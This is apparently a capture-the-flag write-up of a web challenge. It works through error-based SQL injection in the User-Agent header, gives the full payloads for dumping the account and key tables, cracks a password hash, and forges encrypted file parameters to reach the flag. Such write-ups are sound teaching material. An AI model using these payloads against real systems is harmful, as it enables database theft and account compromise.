Our first step was to look for vulnerability, checking input fields in hope for SQL Injection. Each time we've tried to login there was a message about unsupported browser


<span>
Then we've started trying to use SQLi in User-Agent header. We've managed to get a syntax error

</span>
<span>
At this point it looks like its error based SQLi, lets try to get database version</span>

• User-Agent: ' or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(1) #

<span>
Lets dump database. Getting tables first
</span>

• User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(table_name separator ',') from information_schema.tables where table_schema=database()),floor(rand(0)*2)) having min(1) #
  

<span>
Getting columns from accounts table</span>

• User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(column_name separator ',') from information_schema.columns where table_name='accounts'),floor(rand(0)*2)) having min(1) #

<span>Warning: mysqli_query(): (23000/1062): Duplicate entry 'uid,uname,pwd,age,zipcode:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57</span>

Getting rows

• User-Agent: ' or 1 group by concat_ws(0x3a,(select concat_ws(0x2c,uid,uname,pwd,age,zipcode) from accounts),floor(rand(0)*2)) having min(1) #

<span>Warning: mysqli_query(): (23000/1062): Duplicate entry
'10000,ori,6606a19f6345f8d6e998b69778cbf7ed,28,89918:1' for key
'<group_key>' in /var/www/html/web500/index.php on line 57</span><span>

There is only one row inside of accounts table
</span>

• uname: ori
• pwd: frettchen (checking hash 6606a19f6345f8d6e998b69778cbf7ed in online MD5 databases)
  

After login we can see another puzzle for this challenge



Taking a look into URL

• /web500/ba3988db0a3167093b1f74e8ae4a8e83.php?file=uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA=
  

So we're sending some file parameter that is encoded in Base64. Checking source of this page shows that there is a commented PHP function



Its missing $key value, lets back to SQLi and dump cryptokey table

• User-Agent: ' or 1 group by concat_ws(0x3a,(select group_concat(column_name separator ',') from information_schema.columns where table_name='cryptokey'),floor(rand(0)*2)) having min(1) #

<span>
Warning: mysqli_query(): (23000/1062): Duplicate entry 'id,keyval,keyfor:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57

</span>

• User-Agent: ' or 1 group by concat_ws(0x3a,(select concat_ws(0x3a,id,keyval,keyfor) from cryptokey),floor(rand(0)*2)) having min(1) #

<span>Warning: mysqli_query(): (23000/1062): Duplicate entry '1,TheTormentofTantalus,File Access:1' for key '<group_key>' in /var/www/html/web500/index.php on line 57</span>

Adding missing $key="TheTormentofTantalus" <span>and using decrypt("uWN9aYRF42LJbElOcrtjrFL6omjCL4AnkcmSuszI7aA=") returns </span>flag-hint
So at this point we want to encrypt "flagflagflagflag.txt", but first we need to write encrypt function based on decrypt



Since decrypt function taking <span>initialization vector from given input, we dont care about it (random in our case). It's important to urlencode result of base64encode because we'll use it later to send as GET parameter (+ signs from base64 would be changed into spaces).

Its time to check if its working properly
</span>

• encrypt('flag-hint') results in "rj6Z77cpkFPmIoMbapgGUD%2F3T8lBr7ZzOaQrGbl%2B73U%3D" (every result will be different because of random IV)
• /web500/ba3988db0a3167093b1f74e8ae4a8e83.php?file=rj6Z77cpkFPmIoMbapgGUD%2F3T8lBr7ZzOaQrGbl%2B73U%3D shows us same page, so encrypt is working properly

We've tried to get a file from encrypt('flagflagflagflag.txt'), but result was "Not allowed to read this file!". After that we've started modyfing input and found valid one:

• encrypt('flagflagflagflag') results in "7WuFCJ5I5vPzscTaPqyq4RBhaBOtID5Oou7xa51X5vo%3D" that leads us to get a flag